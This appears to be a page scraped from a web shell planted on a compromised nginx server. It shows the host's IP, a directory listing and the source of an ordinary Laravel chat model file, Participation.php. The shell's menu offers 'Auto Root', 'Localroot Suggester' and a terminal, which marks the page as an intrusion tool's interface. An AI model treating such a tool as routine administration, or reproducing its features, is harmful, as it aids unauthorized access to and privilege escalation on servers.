Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.218.99.99
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
musonza /
chat /
src /
Models /
Delete
Unzip
Name
Size
Permission
Date
Action
Conversation.php
12.52
KB
-rw-r--r--
2021-02-02 18:21
Message.php
5.01
KB
-rw-r--r--
2021-02-02 18:21
MessageNotification.php
1.98
KB
-rw-r--r--
2021-02-02 18:21
Participation.php
780
B
-rw-r--r--
2021-02-02 18:21
Save
Rename
<?php namespace Musonza\Chat\Models; use Illuminate\Database\Eloquent\Relations\BelongsTo; //use Illuminate\Database\Eloquent\SoftDeletes; use Musonza\Chat\BaseModel; use Musonza\Chat\ConfigurationManager; class Participation extends BaseModel { // use SoftDeletes; protected $table = ConfigurationManager::PARTICIPATION_TABLE; protected $fillable = [ 'conversation_id', 'settings', ]; protected $casts = [ 'settings' => 'array', ]; /** * Conversation. * * @return BelongsTo */ public function conversation() { return $this->belongsTo(Conversation::class, 'conversation_id'); } public function messageable() { return $this->morphTo()->with('participation'); } }